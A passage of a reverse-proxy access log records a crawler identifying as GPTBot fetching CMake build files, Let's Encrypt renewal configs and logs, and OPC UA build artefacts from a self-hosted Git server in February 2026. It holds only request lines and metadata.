192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10364] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14923] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:16:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11655] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16058] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11733] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11733] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11304] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11305] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10677] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14925] [Gzip 9.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11187] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10015] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11187] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10209] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10209] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11935] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" +[17/Feb/2026:16:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 44909] [Gzip 12.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 51769] [Gzip 13.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 39839] [Gzip 13.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt?display=source" [Client 74.7.227.38] [Length 11274] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:16:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:16:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr 